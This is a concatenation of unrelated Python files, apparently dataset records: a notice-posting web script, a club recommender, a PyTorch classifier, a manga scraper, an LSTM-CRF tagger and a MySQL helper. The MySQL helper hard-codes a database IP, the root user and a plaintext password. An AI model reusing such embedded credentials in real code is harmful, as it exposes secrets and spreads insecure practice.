self.addActionError(u\"您你没有管理的权限!\")\r\n return self.ERROR\r\n placardId = self.params.safeGetIntParam(\"placardId\")\r\n if placardId > 0:\r\n self.placard = self.placradService.getPlacard(placardId) \r\n \r\n if request.getMethod() == \"POST\":\r\n self.clear_subject_cache()\r\n self.save_post()\r\n \r\n return self.news_edit()\r\n \r\n def news_edit(self):\r\n request.setAttribute(\"placard\", self.placard)\r\n return \"/WEB-INF/subjectmanage/placard_add.ftl\"\r\n \r\n def save_post(self):\r\n placard_title = self.params.safeGetStringParam(\"placard_title\")\r\n content = self.params.safeGetStringParam(\"content\") \r\n if placard_title == \"\":\r\n self.addActionError(u\"请输入标题\")\r\n return self.ERROR\r\n if content == \"\":\r\n self.addActionError(u\"请输入内容\")\r\n return self.ERROR\r\n if self.placard == None:\r\n self.placard = Placard()\r\n self.placard.setObjId(self.subject.subjectId)\r\n self.placard.setObjType(14)\r\n self.placard.setHide(False)\r\n self.placard.setTitle(placard_title)\r\n self.placard.setUserId(self.loginUser.userId)\r\n self.placard.setContent(content)\r\n self.placradService.savePlacard(self.placard)\r\n response.sendRedirect(\"placard.py?id=\" + str(self.subject.subjectId))","sub_path":"WebContent/subject/manage/placard_add.py","file_name":"placard_add.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"25960983","text":"class Planner(object):\n def __init__(self, remove_local_file):\n self.remove_local_file = remove_local_file\n\n def plan(self, snapshot_from, snapshot_to):\n plans = []\n # Add and update files\n for key, from_item in snapshot_from.items():\n if key not in snapshot_to:\n plans.append(('add', key, from_item))\n else:\n to_item = snapshot_to[key]\n if to_item.size != from_item.size or to_item.modified_at != from_item.modified_at:\n plans.append(('update', key, from_item))\n # Remove files\n for key, to_item in snapshot_to.items():\n if key not in snapshot_from:\n plans.append(('delete', key, to_item))\n return plans\n","sub_path":"canvas_grab/planner.py","file_name":"planner.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"428991400","text":"####### APPLICATION.PY #######\n####### This file runs the application #######\n####### It starts the recommender object, adds the data, and starts the GUI #######\n\nimport recommender\nfrom datetime import datetime\nfrom Interface_Classes import MainWindow\n\n# add data to the interface's recommender object\ndef addData():\n global u1, u2, u3, u4, u5\n\n # create the users\n u1 = recommend.addUser(1)\n u2 = recommend.addUser(2)\n u3 = recommend.addUser(3)\n u4 = recommend.addUser(4)\n u5 = recommend.addUser(5)\n\n # add clubs to the users\n u1.addClub('MuskieTHON', recommend)\n u1.addClub('Computer Science Club', recommend)\n u1.addClub(\"Accounting Society\", recommend)\n\n u2.addClub('MuskieTHON', recommend)\n u2.addClub('A Xavier Christmas', recommend)\n u2.addClub('Computer Science Club', recommend)\n\n u3.addClub('A Xavier Christmas', recommend)\n u3.addClub('4 Paws for Ability at XU', recommend)\n u3.addClub(\"Don't Tell Anna\", recommend)\n\n u4.addClub('A Xavier Christmas', recommend)\n u4.addClub(\"Don't Tell Anna\", recommend)\n u4.addClub('MuskieTHON', recommend)\n\n u5.addClub(\"Computer Science Club\", recommend)\n u5.addClub(\"Don't Tell Anna\", recommend)\n u5.addClub('A Xavier Christmas', recommend)\n\n # add interests to the users\n recommend.addUserInterest(1, \"STEM\")\n recommend.addUserInterest(1, \"General Interests\")\n recommend.addUserInterest(1, \"Spirituality\")\n\n recommend.addUserInterest(2, \"Health Professions\")\n recommend.addUserInterest(2, \"Wellness\")\n recommend.addUserInterest(2, \"Service & Social Justice\")\n\n recommend.addUserInterest(3, \"STEM\")\n recommend.addUserInterest(3, \"General Interests\")\n recommend.addUserInterest(3, \"Wellness\")\n\n recommend.addUserInterest(4, \"Service & Social Justice\")\n recommend.addUserInterest(4, \"Spirituality\")\n recommend.addUserInterest(4, \"STEM\")\n\n # create date objects for the events\n date_1 = datetime(year= 2019, month = 5, day = 25, hour = 19, minute = 0)\n date_1_2 = datetime(year=3020, month = 5, day = 25, hour = 19, minute = 0)\n date_2 = datetime(year= 3020, month = 5, day = 25, hour = 19, minute = 0)\n\n # add events to some clubs\n recommend.addEventToClub(\"Computer Science Club\", \"Event_1\", date_1, \"Alter Hall Rm 101\", \"This is a longer description to play with text wrapping. The first event that is added to the clubs. It should be showing up for CS club.\")\n recommend.addEventToClub(\"Computer Science Club\", \"Event TBD\", date_1_2, \"Alter Hall Rm 101\", \"The description will be available closer to the event. Please check back a week before the event.\")\n recommend.addEventToClub(\"4 Paws for Ability at XU\", \"Event_2\", date_2, \"Alter Hall Rm 102\", \"Event 2\")\n\n recommend.addEventToClub(\"Don't Tell Anna\", \"Spring Show\", date_2, \"Kennedy Auditorium\", \"Spring Show\")\n recommend.addEventToClub(\"MuskieTHON\", \"Dance Marathon\", date_2, \"GSC\", \"The 24 Hour Dance Marathon\")\n return None\n\n####### START THE PROGRAM #######\n\nrecommend = recommender.Recommender() # starts the recommender object\naddData() # adds the data to the recommender\nMainWindow(recommend) # starts the GUI and drives it\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133438960","text":"from __future__ import division;\nfrom __future__ import print_function;\nfrom __future__ import absolute_import;\nimport sys;\nimport os;\nscriptsDir = os.environ.get(\"UTIL_SCRIPTS_DIR\");\nif (scriptsDir is None):\n raise Exception(\"Please set environment variable UTIL_SCRIPTS_DIR\");\nsys.path.insert(0,scriptsDir);\nimport pathSetter;\nfrom sets import Set;\nimport copy;\nfrom collections import OrderedDict;\nfrom collections import namedtuple;\nimport sklearn.metrics;\nimport numpy as np;\n\ndef normaliseByRowsAndColumns(theMatrix):\n \"\"\"\n The matrix is as a dictionary\n \"\"\"\n sumEachRow = OrderedDict();\n sumEachColumn = OrderedDict();\n for row in theMatrix:\n sumEachRow[row] = 0;\n for col in theMatrix[row]:\n if col not in sumEachColumn:\n sumEachColumn[col] = 0;\n sumEachRow[row] += theMatrix[row][col];\n sumEachColumn[col] += theMatrix[row][col];\n normalisedConfusionMatrix_byRow = copy.deepcopy(theMatrix);\n normalisedConfusionMatrix_byColumn = copy.deepcopy(theMatrix);\n for row in theMatrix:\n for col in theMatrix[row]:\n normalisedConfusionMatrix_byRow[row][col] = 0 if sumEachRow[row] == 0 else theMatrix[row][col]/sumEachRow[row];\n normalisedConfusionMatrix_byColumn[row][col] = 0 if sumEachColumn[col] == 0 else theMatrix[row][col]/sumEachColumn[col];\n\n return normalisedConfusionMatrix_byRow, normalisedConfusionMatrix_byColumn, sumEachRow, sumEachColumn;\n\nConfusionMatrixStats = namedtuple('ConfusionMatrixStats', ['confusionMatrix', 'normalisedConfusionMatrix_byRow', 'normalisedConfusionMatrix_byColumn', 'sumEachRow', 'sumEachColumn', 'truePositiveRate', 'trueNegativeRate', 'balancedAccuracy', 'overallAccuracy', 'overallBalancedAccuracy', \"majorityClass\"]);\ndef computeConfusionMatrixStats(actual, predictions, labelOrdering=None):\n confusionMatrix = sklearn.metrics.confusion_matrix(actual, predictions);\n sumEachRow=np.sum(confusionMatrix,axis=1);\n sumEachColumn=np.sum(confusionMatrix,axis=0);\n normalisedConfusionMatrix_byRow = confusionMatrix/(sumEachRow[:,None] + 0.000000000000000000000000000000000000000000000000000000000000000001);\n normalisedConfusionMatrix_byColumn = confusionMatrix/(sumEachColumn[None,:]+ 0.00000000000000000000000000000000000000000000000000000000000001);\n #compute accuracy/balanced accuracy\n #accuracy is everything on the diagonal\n correctPredictions=0;\n for i in xrange(confusionMatrix.shape[0]):\n correctPredictions += confusionMatrix[i,i];\n totalExamples = np.sum(sumEachRow);\n overallAccuracy = 0.0 if totalExamples==0 else float(correctPredictions)/totalExamples;\n majorityClass = 0.0 if totalExamples==0 else float(max(sumEachRow))/totalExamples;\n #compute balanced accuracies\n truePositiveRate = OrderedDict();\n trueNegativeRate = OrderedDict();\n balancedAccuracy = OrderedDict();\n totalExamples = len(actual);\n for row in xrange(len(confusionMatrix)):\n truePositiveRate[row] = normalisedConfusionMatrix_byRow[row,row];\n trueNegativeRate[row] = (totalExamples - sumEachColumn[row])/(totalExamples - sumEachRow[row]) if (totalExamples-sumEachRow[row]) > 0 else 0.0;\n balancedAccuracy[row] = (truePositiveRate[row] + trueNegativeRate[row])/2;\n overallBalancedAccuracy = 0;\n for row in xrange(len(confusionMatrix)):\n overallBalancedAccuracy += balancedAccuracy[row];\n overallBalancedAccuracy = overallBalancedAccuracy / len(confusionMatrix);\n \n return ConfusionMatrixStats(confusionMatrix, normalisedConfusionMatrix_byRow, normalisedConfusionMatrix_byColumn, sumEachRow, sumEachColumn, truePositiveRate, trueNegativeRate, balancedAccuracy, overallAccuracy, overallBalancedAccuracy, majorityClass); \n \ndef printConfusionMatrix(matrix, isFloat=False):\n print(\"\\t\"+\"\\t\".join(str(x) for x in matrix[matrix.keys()[0]].keys()));\n for row in matrix:\n print(str(row)+\"\\t\"+\"\\t\".join((\"{0:.2f}\".format(x) if isFloat else str(x)) for x in matrix[row].values()));\n\n\n \n\n","sub_path":"util/accuracyStats.py","file_name":"accuracyStats.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73020057","text":"# __author__ = 'penny'\n# -*- coding:utf-8 -*-\n\nimport pymysql\nfrom utils.readyaml import ReadYaml\nfrom utils.log import Log\n\nclass Mydb:\n '''动作类,获取数据库连接,配置数据库IP,端口等信息,获取数据库连接'''\n\n def __init__(self,mysql_config_file):\n config = ReadYaml(mysql_config_file).getValue()\n self.host = config['TESTDB']['host']\n self.port = config['TESTDB']['port']\n self.user = config['TESTDB']['user']\n self.passwd = config['TESTDB']['passwd']\n self.db = config['TESTDB']['db']\n self.charset = config['TESTDB']['charset']\n try:\n self.connect = pymysql.Connect(\n host=self.host,\n port=self.port,\n user=self.user,\n passwd=self.passwd,\n db=self.db\n # charser=self.charset\n )\n except Exception as e:\n self.my_print('数据库初始化连接失败:{0}'.format(e))\n raise\n\n def my_print(self,msg):\n '''打印日志'''\n self.logger = Log()\n self.logger.info(msg)\n\n def get_conn(self):\n '''连接数据库'''\n return self.connect\n\n def execute_create(self,query):\n '''执行sql语句:create'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n cur.close()\n self.connect.commit()\n self.connect.close()\n except Exception as e:\n self.my_print('创建数据库表操作失败:{0}'.format(e))\n self.connect.rollback()\n self.connect.close()\n raise\n\n def execute_insert(self,query,data):\n '''执行sql语句:insert'''\n self.my_print('query:{0} , data: {1}'.format(query,data))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n cur.close()\n self.connect.commit()\n self.connect.close()\n except Exception as e:\n self.my_print('插入数据库表操作失败:{0}'.format(e))\n self.connect.rollback()\n self.connect.close()\n raise\n\n\n def execute_update(self,query):\n '''执行sql语句:update'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n cur.close()\n self.connect.commit()\n self.connect.close()\n except Exception as e:\n self.my_print('更新数据库表操作失败:{0}'.format(e))\n self.connect.rollback()\n self.connect.close()\n raise\n\n def excute_select_one_record(self,query):\n '''执行sql语句:select,返回结果只包含一条数据'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n return cur.fetchone()\n except Exception as e:\n self.my_print('查询数据库表操作失败:{0}'.format(e))\n self.connect.close()\n raise\n\n def excute_select_many_record(self,query):\n '''执行sql语句:select,返回结果包含多条数据'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n return cur.fetchall()\n except Exception as e:\n self.my_print('查询数据库表操作失败:{0}'.format(e))\n self.connect.close()\n raise\n\n def close(self):\n '''关闭'''\n self.connect.cursor().close()\n self.connect.commit()\n self.connect.close()\n\nif __name__ == '__main__':\n sql = 'SELECT count(case_id) FROM test_data'\n db = Mydb('../config/dbconfig.yaml')\n db.excute_select_one_record('SELECT count(case_id) FROM test_data')\n conn = pymysql.Connect(host='10.122.74.230', port=3306, user='root', passwd='infobird123', database='testdb')\n","sub_path":"utils/mydb.py","file_name":"mydb.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363275474","text":"# CDFarm_3outputs+classification_torch\r\n#%% \r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torch.autograd import Variable\r\nimport torch.optim as optim\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nfrom sklearn.metrics import r2_score # for regression\r\nfrom sklearn.metrics import roc_auc_score, roc_curve, auc\r\nfrom hyperopt import fmin, tpe, hp\r\nimport pickle\r\nimport os\r\nimport sys\r\nimport hyperopt.pyll.stochastic\r\n#%%\r\n### see how data looks like\r\n# df = pd.read_excel(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_train.xlsx', header = 0)\r\n# df_array = df.to_numpy()\r\n\r\n# for i in range(3, 8):\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='3d')\r\n# x = df_array[:, 0]\r\n# y = df_array[:, 1]\r\n# z = df_array[:, 2]\r\n\r\n# c = df_array[:, i] \r\n\r\n# img = ax.scatter(x, y, z, c=c, cmap='viridis', alpha=0.5)\r\n\r\n# plt.title(str('y'+ str(i)))\r\n\r\n# plt.xlabel('x1')\r\n# plt.ylabel('x2')\r\n# plt.ylabel('x3')\r\n\r\n# fig.colorbar(img)\r\n# plt.show()\r\n#%%\r\ndef datapreparation(file_path):\r\n\r\n df = pd.read_excel(file_path, header = 0)\r\n df_array = df.to_numpy() # first transform df to numpy array \r\n\r\n # Access features and normalize them\r\n x = torch.from_numpy(df_array[:, 0:3]) # transform numpy array to tensors # prices of barley, rapeseed, wheat \r\n picklename = \"scaling_metrics_01.pkl\"\r\n if not os.path.exists(picklename):\r\n x_mean = torch.mean(x)\r\n x_sd = torch.sqrt(torch.var(x))\r\n export = (x_mean,x_sd)\r\n pickle.dump( export, open( picklename, \"wb\" ) )\r\n elif os.path.exists(picklename):\r\n (x_mean,x_sd) = pickle.load( open( picklename, \"rb\" ) )\r\n else:\r\n print(\"Error in Scaling Metrics\")\r\n sys.exit()\r\n\r\n x = (x - x_mean)/x_sd # normalization\r\n\r\n # Access lables and normalize y1-y4\r\n y_reg = torch.from_numpy(df_array[:, 3:7]) # get data of y1-y4\r\n y_reg = (y_reg - torch.min(y_reg)) / (torch.max(y_reg) - torch.min(y_reg)) \r\n y_cla = torch.from_numpy(df_array[:, 7]).reshape(y_reg.shape[0],1) # get data of y5\r\n y = torch.cat((y_reg, y_cla), 1) \r\n \r\n print('Type and shape of x', x.type, x.shape)\r\n print('Type and shape of y', y.type, y.shape)\r\n return [x, y]\r\n\r\ntrain_file = datapreparation(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_train.xlsx')\r\nvalidation_file = datapreparation(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_validation.xlsx')\r\ntest_file = datapreparation(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_test.xlsx')\r\nprint(train_file[0]) # outcome of the datapreparation function X\r\nprint(train_file[1]) # outcome of the datapreparation function y\r\n \r\n#%%\r\n# create a class for custom dataloader\r\nclass DatasetCDFarm(Dataset): \r\n\r\n def __init__(self, file):\r\n \r\n self.x = file[0] \r\n self.y = file[1] \r\n \r\n # print('x:',self.x)\r\n # print('y:', self.y)\r\n \r\n print('shape of x: ', self.x.shape)\r\n print('shape of y: ', self.y.shape)\r\n \r\n # PyTorch gives you the freedom to pretty much do anything with the Dataset class,\r\n # so long as you override two of the subclass functions: \r\n\r\n def __getitem__(self, index): \r\n # returns the data and labels \r\n return self.x[index], self.y[index]\r\n\r\n def __len__(self): \r\n # return the size of the dataset, so that torch can divide data into batches\r\n self.len = self.x.shape[0]\r\n return self.len\r\n\r\n# Load train, validation and test data\r\ntrain_dataset = DatasetCDFarm(train_file)\r\ntrain_loader = DataLoader(dataset=train_dataset, \r\n batch_size = 4, \r\n shuffle = True) \r\nvalidation_dataset = DatasetCDFarm(validation_file)\r\nvalidation_loader = DataLoader(dataset=validation_dataset, \r\n batch_size = len(validation_dataset)) \r\ntest_dataset = DatasetCDFarm(test_file)\r\ntest_loader = DataLoader(dataset=test_dataset, batch_size=len(test_dataset)) \r\n\r\n\r\n\r\n#%%\r\n# create Net class: construct the Neural Network\r\nclass Net(nn.Module): \r\n #class initialization \r\n\r\n def __init__(self, input_size, hidden1_size, hidden2_size, output_size): \r\n super(Net, self).__init__() # super fconstructor creates an instance of the base nn.Module \r\n \r\n self.fc1 = nn.Linear(input_size, hidden1_size) # first hidden layer\r\n self.relu1 = nn.ReLU()\r\n self.fc2 = nn.Linear(hidden1_size, hidden2_size) # output layer\r\n self.relu2 = nn.ReLU()\r\n self.fc3 = nn.Linear(hidden2_size, output_size)\r\n #define how data flows in this network, needs to be defined for each network\r\n def forward(self, x):\r\n # pass data through the net\r\n out1 = self.fc1(x)\r\n out2 = self.relu1(out1)\r\n out3 = self.fc2(out2) \r\n out4 = self.relu2(out3)\r\n out5 = self.fc3(out4)\r\n out_reg = out5[:, 0:4] # y1-y4 regression problem, y5 is classification problem \r\n out_cla1 = torch.sigmoid(out5[:, 4]).reshape(out5.shape[0],1) # transform y5 with sigmoid function \r\n # out_cla2 = out_cla1 #(out_cla1>0.5).float()\r\n out = torch.cat((out_reg, out_cla1), 1)\r\n return out\r\n \r\n# print this network architecture:\r\nMyNet = Net(3, 90, 50, 5)\r\nprint(MyNet)\r\n\r\n\r\n#%%\r\ndef train(epochs, train_loader, validation_loader, MyNet, optimizer, criterion1, criterion2):\r\n \r\n Train_Losses = [] # empty list to store train losses through epochs\r\n Val_Losses = [] # empty list to store validation losses through epochs\r\n \r\n for epoch in range(epochs):\r\n train_loss = 0.0\r\n validation_loss = 0.0\r\n \r\n MyNet.train()\r\n for batch_id, data in enumerate(train_loader):\r\n optimizer.zero_grad() \r\n inputs, labels = data\r\n inputs = Variable(inputs).float()\r\n labels = Variable(labels).float()\r\n # print('train inputs:', inputs)\r\n # print('train labels:', labels)\r\n out = MyNet(inputs)\r\n # print('train out:', out)\r\n\r\n out_reg, labels_reg = out[:, 0:4], labels[:, 0:4]\r\n out_cla, labels_cla = out[:, 4], labels[:, 4]\r\n\r\n loss_reg = criterion1(out_reg, labels_reg)\r\n loss_cla = criterion2(out_cla, labels_cla)\r\n # print('Regression loss: ', loss_reg)\r\n # print('Classification loss: ', loss_cla)\r\n\r\n loss = loss_reg * 1000 + loss_cla # loss function\r\n loss.backward()\r\n optimizer.step()\r\n train_loss += loss.item()\r\n train_loss /= len(train_loader) \r\n Train_Losses.append(train_loss) # store train_loss to Train_Losses\r\n\r\n MyNet.eval()\r\n for data in validation_loader:\r\n inputs, labels = data\r\n inputs = Variable(inputs).float()\r\n labels = Variable(labels).float()\r\n out = MyNet(inputs)\r\n #print('validation out:', out)\r\n\r\n out_reg, labels_reg = out[:, 0:4], labels[:, 0:4]\r\n out_cla, labels_cla = out[:, 4], labels[:, 4]\r\n\r\n loss_reg = criterion1(out_reg, labels_reg)\r\n loss_cla = criterion2(out_cla, labels_cla)\r\n \r\n loss = loss_reg * 1000 + loss_cla\r\n validation_loss += loss.item()\r\n validation_loss /= len(validation_loader) \r\n Val_Losses.append(validation_loss) # # store validation_loss to Val_Losses\r\n\r\n print(\"Epoch: {}/{}..\".format(epoch+1, epochs),\r\n \"Training loss: {:.3f}..\".format(train_loss/len(train_loader)),\r\n \"Validation loss: {:.3f}..\".format(validation_loss/len(validation_loader)))\r\n \r\n plt.plot(Train_Losses, label='Training losses')\r\n plt.plot(Val_Losses, label='Validation losses')\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n return MyNet\r\n#%%\r\ndef test(test_loader, criterion1, criterion2):\r\n MyNet.eval()\r\n loss = 0\r\n for inputs, labels in test_loader:\r\n inputs = Variable(inputs).float() # or inputs = Variable(torch.FloatTensor(inputs)) \r\n labels = Variable(labels).float()\r\n # print('labels:', labels)\r\n out = MyNet(inputs)\r\n # print('out:', out)\r\n out_reg, labels_reg = out[:, 0:4], labels[:, 0:4]\r\n out_cla, labels_cla = out[:, 4], labels[:, 4]\r\n\r\n loss_reg = criterion1(out_reg, labels_reg)\r\n loss_cla = criterion2(out_cla, labels_cla)\r\n\r\n \r\n loss = loss_reg * 1000 + loss_cla\r\n loss += loss.item()\r\n # print('loss:', loss)\r\n\r\n pred_reg=out_reg.data.numpy()\r\n pred_cla=out_cla.data.numpy()\r\n r2 = r2_score(pred_reg, labels_reg)\r\n \r\n\r\n fpr, tpr, thresholds = roc_curve(labels_cla, pred_cla, pos_label=0)\r\n # Print ROC curve\r\n plt.plot(fpr,tpr)\r\n plt.show() \r\n # Print AUC\r\n auc = np.trapz(tpr,fpr)\r\n \r\n\r\n Average_loss = loss/len(test_loader.dataset)\r\n print(\"Average loss:\", Average_loss)\r\n print('Square rooted loss:', torch.sqrt(loss))\r\n print('R squared:', r2)\r\n print('AUC:', auc) # good auc should be close to 1 \r\n#%%\r\n\r\n#%%\r\ndef main():\r\n\r\n criterion1 = nn.MSELoss()\r\n criterion2 = nn.BCELoss()\r\n optimizer = optim.Adam(MyNet.parameters(), lr=0.01)\r\n epochs = 20\r\n\r\n train(epochs, train_loader, validation_loader, MyNet, optimizer, criterion1, criterion2)\r\n \r\n \r\n # space={\r\n # 'lr': hp.uniform('lr', 0, 1),\r\n # 'hidden1_size': hp.quniform('hidden1_size', 50,100,1),\r\n # 'hidden2_size': hp.quniform('hidden2_size', 50,100,1)\r\n # }\r\n\r\n # # for i in range(10):\r\n # # sample = hyperopt.pyll.stochastic.sample(space)\r\n # # print(sample)\r\n\r\n # best = fmin(\r\n # fn= objective,\r\n # space = space,\r\n # algo=tpe.suggest,\r\n # max_evals=10)\r\n # print(best)\r\n\r\n # params = {'hidden1_size': best['hidden1_size'], 'hidden2_size': best['hidden2_size'], 'lr': best['lr']}\r\n # print(params)\r\n # objective(params)\r\n\r\n test(test_loader, criterion1, criterion2)\r\n\r\n print('model is trained')\r\n\r\n#%%\r\nmain()\r\n\r\n#%%\r\n# Construct our loss function and an Optimizer. The call to model.parameters()\r\n\r\n\r\n# loss_values = [] \r\n\r\n# for epoch in range(epochs):\r\n# cum_loss = 0\r\n \r\n# MyNet.train()\r\n# for batch_id, data in enumerate(train_loader):\r\n# # get the inputs\r\n# inputs, labels = data\r\n\r\n# # wrap them in Variable\r\n# inputs = Variable(inputs).float()\r\n# labels = Variable(labels).float()\r\n\r\n# # print(epoch, batch_id, \"inputs\", inputs.data, \"labels\", labels.data)\r\n# # Forward pass\r\n \r\n# out = MyNet(inputs)\r\n# # print('out', type(out),out)\r\n# # print('labels', type(labels),labels)\r\n\r\n# loss1 = criterion1(out[:, 0:4], labels[:, 0:4])\r\n# loss2 = criterion2(out[:, 4], labels[:, 4])\r\n\r\n# loss = loss1 + 0.1*loss2\r\n# print(epoch, batch_id, loss.data)\r\n# cum_loss += loss.data\r\n\r\n# # Zero gradients, perform a backward pass, and update the weights\r\n# optimizer.zero_grad()\r\n# loss.backward()\r\n# optimizer.step()\r\n\r\n# loss_values.append(cum_loss/len(train_dataset))\r\n\r\n# plt.plot(loss_values)\r\n\r\n\r\n# #%%\r\n\r\n# test_dataset = DatasetCDFarm(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_test.xlsx')\r\n# test_loader = DataLoader(dataset=test_dataset) \r\n# #%%\r\n# def test():\r\n# MyNet.eval()\r\n# loss = 0\r\n# for inputs, labels in test_loader:\r\n# inputs = Variable(inputs).float()\r\n# labels = Variable(labels).float()\r\n# print('labels:', labels)\r\n# out = MyNet(inputs)\r\n# print('out:', out)\r\n\r\n# loss1 = criterion1(out[:, 0:4], labels[:, 0:4])\r\n# loss2 = criterion2(out[:, 4], labels[:, 4])\r\n# loss = loss1 + 0.1*loss2\r\n\r\n# loss += loss.item()\r\n# print('loss:', loss)\r\n# Average_loss = loss/len(test_loader.dataset)\r\n# print(\"Average loss:\", Average_loss)\r\n\r\n# test()\r\n\r\n# print('Square rooted loss:', torch.sqrt(loss))\r\n\r\n\r\n#%%\r\n","sub_path":"CDFarm_3outputs+classification.py","file_name":"CDFarm_3outputs+classification.py","file_ext":"py","file_size_in_byte":12525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"404735569","text":"from bs4 import BeautifulSoup\nimport os\nimport requests\n\nlink = 'https://ww5.readsnk.com/chapter/shingeki-no-kyojin-chapter-000'\n\nfor i in range(112):\n if (i<9):\n num= link[-1:]\n num=int(num)\n num+=1\n link= link[:-1]+str(num)\n elif(i>=9 and i<99):\n num= link[-2:]\n num=int(num)\n num+=1\n link= link[:-2]+str(num)\n elif(i>=99 and i<110):\n num= link[-3:]\n num=int(num)\n num+=1\n link= link[:-3]+str(num)\n try:\n os.mkdir('Chapter '+str(i+1))\n os.chdir('./'+'Chapter '+str(i+1))\n response = requests.get(link)\n page = BeautifulSoup(response.text,'html.parser')\n images = page.find_all('img',{\n 'class': 'pages__img'\n })\n\n \n for index,img in enumerate(images,start=1):\n image= requests.get(img.get('src'))\n name=str(index)+'.png'\n with open(name,'wb') as f:\n f.write(image.content)\n\n os.chdir('..')\n except FileExistsError:\n print('chapter ' + str(i+1)+' already exists')\n \n \n\n \n\n \n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"310914524","text":"from lstm_crf_tagger import LSTM_CRF_Tagger\r\n\r\nclass LSTM_CRF_Tagger_CoNLL2000(LSTM_CRF_Tagger):\r\n \r\n def __init__(self,\r\n train_path,\r\n model_name,\r\n max_length,\r\n embedding_dim,\r\n epochs,\r\n batch_size,\r\n mask,\r\n n_gpu=None):\r\n super(LSTM_CRF_Tagger_CoNLL2000, self).__init__(\r\n train_path=train_path,\r\n model_name=model_name,\r\n max_length=max_length,\r\n embedding_dim=embedding_dim,\r\n epochs=epochs,\r\n batch_size=batch_size,\r\n mask=mask,\r\n n_gpu=n_gpu\r\n )\r\n \r\n def load_file(self, file_name):\r\n print('=' * 70)\r\n print('Loading files...')\r\n with open(file_name, \"r\") as f:\r\n lines = f.readlines()\r\n idx_list = [i + 1 for i, v in enumerate(lines) if v == '\\n']\r\n sentences = []\r\n words = set()\r\n pos_tags = set()\r\n ner_tags = set()\r\n for i, j in zip([0] + idx_list, idx_list + (\r\n [len(lines)] if idx_list[-1] != len(lines) else [])):\r\n sentence = []\r\n for line in lines[i: j - 1]:\r\n splitted = line[:-1].split(' ')\r\n words.add(splitted[0])\r\n pos_tags.add(splitted[1])\r\n ner_tags.add(splitted[2])\r\n sentence.append((splitted[0], splitted[1], splitted[2]))\r\n sentences.append(sentence)\r\n return sentences, words, pos_tags, ner_tags\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n import os\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\n\r\n LSTM_CRF_Tagger_CoNLL2000(\r\n train_path='../../data/CoNLL-2000/train.txt',\r\n model_name='conll2000_mask_50',\r\n max_length=100,\r\n embedding_dim=20,\r\n epochs=50,\r\n batch_size=256,\r\n mask=True,\r\n n_gpu=2\r\n ).main(\r\n test_path='../../data/CoNLL-2000/test.txt'\r\n )\r\n","sub_path":"src/LSTM_CRF/lstm_crf_tagger_conll2000.py","file_name":"lstm_crf_tagger_conll2000.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"177836982","text":"import psycopg2\r\nimport os\r\n\r\nfrom sqlalchemy import insert as insert_\r\nfrom sqlalchemy import update as update_\r\nfrom sqlalchemy import delete as delete_\r\nfrom sqlalchemy import select as select_\r\nfrom sqlalchemy.exc import SQLAlchemyError\r\nfrom sqlalchemy.sql import text\r\nfrom sqlalchemy import inspect, Column, ForeignKey\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import TypeDecorator, Date\r\n\r\n\r\nclass MyFancyType(TypeDecorator):\r\n impl = Date\r\n\r\n def process_literal_param(self, value, dialect):\r\n return \"'%s'\" % value\r\n\r\n\r\ndef select_table(engine):\r\n work_table = table_name = \"\"\r\n primary_key = pk = \"\"\r\n attributes = []\r\n # get all tables from database\r\n Base = declarative_base()\r\n inspector = inspect(engine)\r\n schemas = inspector.get_schema_names()\r\n schema = 'public'\r\n while True:\r\n os.system('cls')\r\n print(\"schema: %s\" % schema)\r\n print(\"Valide tables:\")\r\n for table_name in inspector.get_table_names(schema=schema):\r\n print(table_name)\r\n\r\n work_table = table_name = input(\"Input table you want work with:\")\r\n if table_name in inspector.get_table_names(schema=schema):\r\n break\r\n else:\r\n print(\"Input valid table\")\r\n fk = dict()\r\n for x in inspector.get_foreign_keys(table_name, schema=schema):\r\n fk[x['name']] = str(x[\"referred_table\"]) + \".\" + str(x['referred_columns']).strip('[]\\'')\r\n 